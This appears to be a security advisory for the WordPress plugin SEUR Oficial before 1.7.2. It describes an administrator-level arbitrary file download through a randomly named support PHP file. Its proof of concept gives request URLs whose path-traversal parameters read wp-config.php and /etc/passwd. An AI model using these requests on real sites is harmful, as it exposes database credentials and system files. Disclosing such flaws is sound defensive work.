SEUR Oficial < 1.7.2 - Admin+ Arbitrary File Download

The plugin creates a PHP file with a random name when installed, even though it is used for support purposes, it allows to download any file from the web server without restriction after knowing the URL and a password than an administrator can see in the plugin settings page.

PoC

Navigate to /wp-admin/admin.php?page=seur_status_page and grab the URL for the “Seur Download File URL” (seur-downloader-[random code].php) along with the “Seur Download Password” Then just download any file you want via the following URL: * /wp-content/seur-downloader-[random code].php?label=…/wp-config.php&label;_name=…/wp-config.php&pass;=[password] https://example.com/wp-content/seur-downloader-pgu8yjyt0a.php?label=/etc/passwd&amp;label;_name=/etc/passwd&amp;pass;=3fifyypfm5